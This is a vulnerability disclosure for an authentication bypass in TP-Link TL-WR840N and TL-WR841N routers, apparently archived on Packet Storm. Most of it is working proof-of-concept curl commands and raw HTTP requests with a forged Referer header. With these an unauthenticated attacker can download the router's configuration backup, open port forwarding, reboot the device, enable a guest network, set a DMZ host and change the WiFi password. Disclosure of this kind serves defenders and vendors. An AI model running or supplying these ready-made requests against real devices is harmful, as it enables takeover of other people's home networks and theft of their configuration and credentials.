what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TP-Link TL-WR840N / TL-WR841N Authentication Bypass

TP-Link TL-WR840N / TL-WR841N Authentication Bypass
Posted May 28, 2018
Authored by BlackFog Team

TP-Link TL-WR840N and TL-WR841N suffer from an authentication bypass vulnerability.

tags | exploit, bypass
SHA-256 | 9bc6863b7767effc424671cde611c90b951d22eb5f197625c4189947f30737df

TP-Link TL-WR840N / TL-WR841N Authentication Bypass

Change Mirror Download
Title: TP-Link Multiple Router(TL-WR840N and TL-WR841N) Unauthenticated
Router Access Vulnerability
Author: BlackFog Team
Date: 27 May 2018
Website: SecureLayer7.net
Contact: info@securelayer7.net

Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n
Hardware: TL-WR841N v13 00000013

Version : Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
Hardware Version: TL-WR840N v5 00000005

Vendor Description: TP-Link is the world's #1 provider of consumer WiFi
networking devices, shipping products to over 120 countries and hundreds of
millions of customers. (source https://www.tp-link.com/)


Attack Description :
This issue is caused by improper session handling on /cgi/ Folder or /cgi
file found by Touhid Shaikh(BlackFog Team Member).

if any attacker sends Referer Header with its request and sets Referer:
http://192.168.0.1/mainFrame.htm dan its no authentication required and an
attacker can do router's action without authentication.
below are some of few examples you can see. But the attacker can do mostly
all of the action on a router without Authentication.

NOTE: Except admin's password change bcz its required current password for
changing

##### POC ######
----------------------- Fail attempt -------------------------
root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: close

<html><head><title>403 Forbidden</title></head><body><center><h1>403
Forbidden</h1></center></body></html>

-----------------------------------------------------

--------------- Seccessfull attempt --------------------------------
root@linux:/workspace# curl -i -s -k -X GET -H "Referer:
http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5984
Connection: keep-alive

root@linux:/workspace# curl -s -k -X GET -H "Referer:
http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin >
backup.bin
root@linux:/workspace# file backup.bin
backup.bin: data
root@linux:/workspace# ls -la backup.bin
-rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin

----------------------------------------------------
##### POC END ######


Evil Actions Without Authentication example.
============== Burp Request and curl command for conf.bin or backup file
=================


####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1

-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close

w@\AAb AaLA1/2AaA-Aa!AEa1A>>aAA!,*-A h[Aa1A3lAa!AA.A(c)-
.....SKIP.......
8/i?1/2i?1/2i?1/2i?1/2W


######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin

------ take a look in backup.bin file --------

===========================================



=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0

----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================



=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

[error]0

----Description -----
error = 0 means reboot seccessully
======================================



============= Enable Guest Network ==========================
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22'
-H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H
$'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H
$'Connection: close' --data-binary
$'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a'
$'http://192.168.0.1/cgi?2&2&2&2&2'

------- Description ----------
SSID=Agent22
PreSharedKey=9876543210
=============================================



======= DMZ enable and Disable on 192.168.0.112 ===========
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H
$'Content-Length: 78' -H $'Connection: close' --data-binary
$'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a'
$'http://192.168.0.1/cgi?2'

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close

[error]0

-------Description -----------
IPAddress=192.168.0.112
enable=1 or 0 (enable or disable)
=================================================

=============== WiFi Password Change =============
curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type:
text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H
$'Content-Length: 199' -H $'Connection: close' --data-binary
$'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a'
$'http://192.168.0.1/cgi?2'

-------Description -----------
IEEE11iAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
X_TP_PreSharedKey=9876543210
===============================



======= Report Timeline =============
30 Mar, 2018 ----- Initial Report (support.in@tp-link.com) (No Response)
27 May, 2018 ----- Full Disclosure

Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close